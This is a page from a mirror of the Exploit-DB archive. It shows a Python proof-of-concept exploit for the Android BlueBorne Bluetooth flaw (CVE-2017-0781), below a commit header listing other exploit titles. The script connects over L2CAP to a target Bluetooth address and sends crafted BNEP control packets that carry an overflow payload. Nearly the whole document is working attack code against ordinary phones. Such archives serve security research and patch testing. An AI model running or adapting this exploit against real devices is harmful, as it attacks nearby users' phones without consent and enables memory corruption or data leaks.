bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/android/remote/44554.py
Offensive Security 0579cde876 DB: 2018-04-30 
5 changes to exploits/shellcodes

ImageMagick 6.9.3-9/7.0.1-0 - Multiple Vulnerabilities (ImageTragick)
ImageMagick 7.0.1-0 / 6.9.3-9 - 'ImageTragick ' Multiple Vulnerabilities

ImageMagick 6.9.3-9/7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick) (Metasploit)
ImageMagick 6.9.3-9 / 7.0.1-0 - 'ImageTragick' Delegate Arbitrary Command Execution (Metasploit)

Oracle WebLogic Server 10.3.6.0 - Java Deserialization
Oracle WebLogic Server 10.3.6.0 - Java Deserialization Remote Code Execution
Websphere/JBoss/OpenNMS/Symantec Endpoint Protection Manager - Java Deserialization Remote Code Execution
Oracle Weblogic Server 10.3.6.0 / 12.1.3.0 / 12.2.1.2 / 12.2.1.3 - Deserialization Remote Command Execution
Android Bluetooth - 'Blueborne' Information Leak (1)
Android Bluetooth - 'Blueborne' Information Leak (2)
Apache Struts 2.0.1 < 2.3.33 / 2.5 < 2.5.10 - Arbitrary Code Execution
2018-04-30 05:01:48 +00:00

47 lines
No EOL
1.2 KiB
Python
Executable file
Raw Blame History

from pwn import *
import bluetooth
if not 'TARGET' in args:
log.info('Usage: python CVE-2017-0781.py TARGET=XX:XX:XX:XX:XX:XX')
exit()
target = args['TARGET']
count = 30 # Amount of packets to send
port = 0xf # BT_PSM_BNEP
context.arch = 'arm'
BNEP_FRAME_CONTROL = 0x01
BNEP_SETUP_CONNECTION_REQUEST_MSG = 0x01
def set_bnep_header_extension_bit(bnep_header_type):
"""
If the extension flag is equal to 0x1 then
one or more extension headers follows the BNEP
header; If extension flag is equal to 0x0 then the
BNEP payload follows the BNEP header.
"""
return bnep_header_type | 128
def bnep_control_packet(control_type, control_packet):
return p8(control_type) + control_packet
def packet(overflow):
pkt = ''
pkt += p8(set_bnep_header_extension_bit(BNEP_FRAME_CONTROL))
pkt += bnep_control_packet(BNEP_SETUP_CONNECTION_REQUEST_MSG, '\x00' + overflow)
return pkt
bad_packet = packet('AAAABBBB')
log.info('Connecting...')
sock = bluetooth.BluetoothSocket(bluetooth.L2CAP)
bluetooth.set_l2cap_mtu(sock, 1500)
sock.connect((target, port))
log.info('Sending BNEP packets...')
for i in range(count):
sock.send(bad_packet)
log.success('Done.')
sock.close()
Reference in a new issue View git blame Copy permalink